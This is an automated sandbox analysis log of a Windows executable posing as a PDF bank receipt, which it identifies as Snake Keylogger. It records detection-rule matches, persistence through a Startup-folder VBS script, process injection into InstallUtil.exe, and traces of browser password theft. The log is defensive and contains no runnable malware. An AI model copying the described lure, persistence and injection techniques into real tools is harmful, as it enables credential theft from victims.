              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe Code function: 0_2_06C85798 NtProtectVirtualMemory,0_2_06C85798
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe Code function: 0_2_06C867CB NtResumeThread,0_2_06C867CB
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe Code function: 0_2_06C85790 NtProtectVirtualMemory,0_2_06C85790
              Source: C:\Users\user\AppData\Roaming\TypeName.exe Code function: 4_2_06DA67D0 NtResumeThread,4_2_06DA67D0
              Source: C:\Users\user\AppData\Roaming\TypeName.exe Code function: 4_2_06DA5798 NtProtectVirtualMemory,4_2_06DA5798
              Source: C:\Users\user\AppData\Roaming\TypeName.exe Code function: 4_2_06DA67C8 NtResumeThread,4_2_06DA67C8
              Source: C:\Users\user\AppData\Roaming\TypeName.exe Code function: 4_2_06DA5790 NtProtectVirtualMemory,4_2_06DA5790
              Source: e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2041673043.000000000339C000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs e-dekont (72).pdf(#U007e56 KB).exe
              Source: e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2052769159.0000000006C90000.00000004.08000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs e-dekont (72).pdf(#U007e56 KB).exe
              Source: e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2052467032.0000000006BC0000.00000004.08000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs e-dekont (72).pdf(#U007e56 KB).exe
              Source: e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2041086362.000000000118E000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameclr.dllT vs e-dekont (72).pdf(#U007e56 KB).exe
              Source: e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000000.2007108399.0000000000BE4000.00000002.00000001.01000000.00000003.sdmp, Binary or memory string: OriginalFilenamePhykedgoeth.exe8 vs e-dekont (72).pdf(#U007e56 KB).exe
              Source: e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2049418847.0000000003F49000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs e-dekont (72).pdf(#U007e56 KB).exe
              Source: e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2041673043.0000000003306000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs e-dekont (72).pdf(#U007e56 KB).exe
              Source: e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2049418847.0000000003FC1000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs e-dekont (72).pdf(#U007e56 KB).exe
              Source: e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2049418847.0000000003FC1000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamePhykedgoeth.exe8 vs e-dekont (72).pdf(#U007e56 KB).exe
              Source: e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2049418847.0000000003FC1000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs e-dekont (72).pdf(#U007e56 KB).exe
              Source: e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2051557105.0000000006960000.00000004.08000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilenameWscoozgjki.dll" vs e-dekont (72).pdf(#U007e56 KB).exe
              Source: e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2049418847.00000000041C1000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameWscoozgjki.dll" vs e-dekont (72).pdf(#U007e56 KB).exe
              Source: e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2041673043.0000000002F8D000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilename vs e-dekont (72).pdf(#U007e56 KB).exe
              Source: e-dekont (72).pdf(#U007e56 KB).exe, Binary or memory string: OriginalFilenamePhykedgoeth.exe8 vs e-dekont (72).pdf(#U007e56 KB).exe
              Source: e-dekont (72).pdf(#U007e56 KB).exe, Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: 4.2.TypeName.exe.411fdb0.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 4.2.TypeName.exe.411fdb0.3.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 4.2.TypeName.exe.411fdb0.3.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 4.2.TypeName.exe.411fdb0.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.41413d0.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.41413d0.2.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.41413d0.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.41413d0.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 4.2.TypeName.exe.411fdb0.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 4.2.TypeName.exe.411fdb0.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 4.2.TypeName.exe.411fdb0.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 4.2.TypeName.exe.411fdb0.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.41413d0.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.41413d0.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.41413d0.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.41413d0.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.400fdb0.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.400fdb0.6.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.400fdb0.6.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.3fc1590.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.3fc1590.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.3fc1590.4.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 00000006.00000002.4475386970.0000000000416000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000004.00000002.2181644021.00000000034AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 00000000.00000002.2041673043.000000000339C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 00000004.00000002.2192753528.000000000411F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000004.00000002.2192753528.000000000411F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 00000000.00000002.2049418847.00000000041C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000000.00000002.2049418847.00000000041C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 00000006.00000002.4475386970.0000000000419000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 00000004.00000002.2192753528.00000000041A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000004.00000002.2192753528.00000000041A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 00000000.00000002.2049418847.0000000003FC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000000.00000002.2049418847.0000000003FC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: Process Memory Space: e-dekont (72).pdf(#U007e56 KB).exe PID: 7088, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: e-dekont (72).pdf(#U007e56 KB).exe PID: 7088, type: MEMORYSTR Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: Process Memory Space: TypeName.exe PID: 6512, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: TypeName.exe PID: 6512, type: MEMORYSTR Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: Process Memory Space: InstallUtil.exe PID: 1476, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: InstallUtil.exe PID: 1476, type: MEMORYSTR Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: e-dekont (72).pdf(#U007e56 KB).exe, Localization.cs Task registration methods: 'CreateTask'
              Source: e-dekont (72).pdf(#U007e56 KB).exe, TaskFieldStructBuilder.cs Task registration methods: 'RegisterFactory', 'CreateFactory'
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.400fdb0.6.raw.unpack, Localization.cs Task registration methods: 'CreateTask'
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.400fdb0.6.raw.unpack, TaskFieldStructBuilder.cs Task registration methods: 'RegisterFactory', 'CreateFactory'
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.6c90000.10.raw.unpack, ITaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.6c90000.10.raw.unpack, TaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.6c90000.10.raw.unpack, TaskSecurity.cs Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.6c90000.10.raw.unpack, TaskSecurity.cs Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.3fc1590.4.raw.unpack, TaskFolder.cs Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.3fc1590.4.raw.unpack, Task.cs Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.6c90000.10.raw.unpack, User.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.3fc1590.4.raw.unpack, User.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.3fc1590.4.raw.unpack, TaskSecurity.cs Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.3fc1590.4.raw.unpack, TaskSecurity.cs Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.6c90000.10.raw.unpack, TaskPrincipal.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.3fc1590.4.raw.unpack, TaskPrincipal.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.6c90000.10.raw.unpack, Task.cs Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.6c90000.10.raw.unpack, TaskFolder.cs Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
              Source: TypeName.exe.0.dr Binary or memory string: <SyntaxDefinition name="XML" extensions=".xml;.xsl;.xslt;.xsd;.manifest;.config;.addin;.xshd;.wxs;.wxi;.wxl;.proj;.csproj;.vbproj;.ilproj;.booproj;.build;.xfrm;.targets;.xaml;.xpt;.xft;.map;.wsdl;.disco;.ps1xml;.nuspec" xmlns="http://icsharpcode.net/sharpdevelop/syntaxdefinition/2008">
              Source: TypeName.exe.0.dr Binary or memory string: c.xml;.xsl;.xslt;.xsd;.manifest;.config;.addin;.xshd;.wxs;.wxi;.wxl;.proj;.csproj;.vbproj;.ilproj;.booproj;.build;.xfrm;.targets;.xaml;.xpt;.xft;.map;.wsdl;.disco;.ps1xml;.nuspec
              Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winEXE@8/3@3/3
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeName.vbs
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Mutant created: NULL
              Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeName.vbs"
              Source: e-dekont (72).pdf(#U007e56 KB).exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: e-dekont (72).pdf(#U007e56 KB).exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
              Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: InstallUtil.exe, 00000002.00000002.4478272423.0000000002C56000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4482034005.0000000003A6D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4478272423.0000000002C63000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4478272423.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4478272423.0000000002C20000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4478272423.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.000000000359F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.0000000003578000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4482221632.00000000043AD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: e-dekont (72).pdf(#U007e56 KB).exe Virustotal: Detection: 11%
              Source: e-dekont (72).pdf(#U007e56 KB).exe String found in binary or memory: </HTML>)<!--StartFragment-->mHighlighter does not belong to the specified document.
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe File read: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe
              Source: unknown Process created: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe "C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe"
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
              Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeName.vbs"
              Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Roaming\TypeName.exe "C:\Users\user\AppData\Roaming\TypeName.exe"
              Source: C:\Users\user\AppData\Roaming\TypeName.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe Section loaded: mscoree.dll
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe Section loaded: apphelp.dll
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe Section loaded: version.dll
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe Section loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe Section loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe Section loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe Section loaded: wldp.dll
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe Section loaded: profapi.dll
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe Section loaded: cryptsp.dll
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe Section loaded: rsaenh.dll
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe Section loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe Section loaded: iphlpapi.dll
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe Section loaded: dnsapi.dll
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe Section loaded: dhcpcsvc6.dll
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe Section loaded: dhcpcsvc.dll
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe Section loaded: winnsi.dll
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe Section loaded: rasapi32.dll
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe Section loaded: rasman.dll
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe Section loaded: rtutils.dll
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe Section loaded: mswsock.dll
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe Section loaded: winhttp.dll
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe Section loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe Section loaded: rasadhlp.dll
